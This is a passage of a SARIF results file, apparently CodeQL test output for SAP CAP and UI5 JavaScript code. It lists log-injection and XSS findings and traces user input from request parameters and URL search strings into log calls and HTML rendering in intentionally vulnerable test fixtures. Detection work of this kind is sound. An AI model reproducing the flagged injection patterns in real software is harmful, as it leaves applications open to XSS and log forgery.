"javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 41, - "startColumn" : 20, - "endColumn" : 40 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 19, - "endColumn" : 36 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "ccc6f77c65eccb45:1", - "primaryLocationStartColumnFingerprint" : "12" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "req2.params.category" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 13, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 32, - "endColumn" : 36 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 26, - "startColumn" : 19, - "endColumn" : 36 - } - }, - "message" : { - "text" : "\"console:\" + book" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - }, - "region" : { - "startLine" : 23, - "startColumn" : 34, - "endColumn" : 54 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 18, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "be9a18716e55d497:1", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 18, - "endColumn" : 41 - } - }, - "message" : { - "text" : "`[INFO] ... value}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 18, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "be9a18716e55d497:2", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... , true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 18, - "endColumn" : 41 - } - }, - "message" : { - "text" : "`[INFO] ... value}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 18, - "endColumn" : 42 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e197b363f9dc3962:1", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... , true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 34, - "endColumn" : 40 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 18, - "endColumn" : 42 - } - }, - "message" : { - "text" : "`[INFO] ... alue1}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "45280b24f3d81287:1", - "primaryLocationStartColumnFingerprint" : "12" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "req.responseText" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "req.responseText" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 5, - "startColumn" : 27, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "92dbc37bdafc7694:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 5, - "startColumn" : 27, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 12, - "startColumn" : 27, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "faa1832c387d2ee5:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 12, - "startColumn" : 27, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 33 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8291f53a2e235d15:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 132, - "startColumn" : 7, - "endLine" : 134, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "63ace7b071639814:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 25, - "endColumn" : 48 - } - }, - "message" : { - "text" : "oSearch ... Value()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 11, - "endColumn" : 48 - } - }, - "message" : { - "text" : "searchValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 27, - "startColumn" : 34, - "endColumn" : 45 - } - }, - "message" : { - "text" : "searchValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 17, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 133, - "startColumn" : 8, - "endColumn" : 27 - } - }, - "message" : { - "text" : "oControl.getTitle()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 132, - "startColumn" : 7, - "endLine" : 134, - "endColumn" : 16 - } - }, - "message" : { - "text" : "\"
T ...
